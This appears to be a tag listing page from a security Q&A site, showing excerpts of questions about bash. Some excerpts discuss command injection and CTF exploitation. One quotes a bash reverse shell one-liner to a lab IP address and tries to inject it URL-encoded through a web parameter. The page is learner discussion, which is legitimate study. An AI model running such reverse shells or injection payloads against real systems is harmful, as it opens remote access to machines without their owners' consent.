Questions tagged [bash]
The Bourne-again shell (Bash) is a unix shell. It lets the user run commands on the host machine in as a text based program. Questions using this tag should either be related to vulnerabilities of bash or proper use of specific commands.
163 questions
5votes
3answers
1kviews
Are these bash lines (handling untrusted user input) vulnerable to command injection?
If $1 contains untrusted user input for example $(whoami). Are any of the following bash examples vulnerable to command injection? I'm having issues clearly understanding this behavior in Bash. Also, ...
- 7,657
0votes
0answers
51views
benefit to reading sensitive file chunks via a "middleman" shell script?
tldr: is using a script spawned by my main process, which reads only a chunk of a sensitive file then passing the result to my main process - of any benefit? in contrast to loading the file in my ...
- 101
3votes
2answers
251views
Is this code vulnerable to injection?
I'm reviewing code which apparently ignores all security standards but doesn't seem to be exploitable due to its peculiar construction. The first stage is a Java Spring application and the name ...
- 31
0votes
0answers
40views
Python os.system() does not change EUID to 0, but os.execl() does, why? [duplicate]
I was working on a Capture the Flag (CTF) challenge that involved a setuid-enabled binary, '/usr/bin/python', where the owner is 'root.' I assumed the user was "www-data", with UID=33. The ...
0votes
0answers
295views
how to exploit read -p in bash script
i wanna execute ls command inplace of the output being "your name is ls" is there a way to do it ? read -p "name??" name echo "your name is $name"
0votes
0answers
1kviews
Bash reverse shell as a URL parameter value
I try to put bash reverse shell as a URL parameter. The command is as follows: bash -i >& /dev/tcp/192.168.56.105/4444 0>&1 I have encoded the above code with URL encoding bash%20-i%20%...
0votes
1answer
186views
Auto-opening a reverse bash shell
Is it possible to use a tool like netcat to create a listener on the attacker's device with a specific command that when the target device or machine connects to this IP and port, it runs a bash shell ...
4votes
1answer
240views
GPG allows importing an invalid secp256k1 public key
I came across a PGP public key that seems invalid. The key is a secp256k1 public key that supported by GPG. In fact, GPG allows importing that key even if it has an invalid secp256k1 public key inside....
1vote
1answer
3kviews
Doing a diff between two keystore files
I have a keystore file with certificates and I want to compare if the second keystore has exactly the same contents as the first one. One approach would be to extract the certificates using keytool ...
- 221
0votes
0answers
134views
How to isolate a bash script process?
I have a bash script that opens various random files that could be anything (PDF, xlsx, MKV, MP4, WebM, html). Since I don't fully trust the source of these files, there is a chance that some of them ...
1vote
0answers
1kviews
How can you perform OS Command Injection when single-quotes are filtered?
While attempting OS Command Injection on a url.com/?ping= parameter, I see that all single quotes ' are being escaped and replaced by \\'. This is problematic because whenever you submit a value to ?...
- 11
-1votes
1answer
129views
How i can grep only subdomain names without "target.com" [closed]
i have w wordlist of subdomains contains like this : admin.bugbountytarget.com portal.bugbountytarget.com sales.bugbountytarget.com vpn1.bugbountytarget.com dev.test.bugbountytarget.com ... And I ...
0votes
1answer
399views
bash: how to securely source a script from an environment variable
Say I want to do source $VIRTUAL_ENV/bin/activate in my bashrc whenever the VIRTUAL_ENV is defined. In general, the idea of running a script pointed by an environment variable seems a bit fishy as it ...
- 103
1vote
1answer
196views
What scenarios does calling `clear` at the end of an ssh session protect against?
I have noticed that some server configurations put a clear command in the default ~/.bash_logout file, also with the comment "Clear the screen for security's sake". I can see that this ...
- 673
7votes
2answers
2kviews
/opt and sudo unzip to /opt, is it safe?
Usually we place things in /opt so they are owned by root but normal users can execute them. This prevents normal users modifying the binaries so they cannot execute arbitrary stuff. However, to put ...
- 317
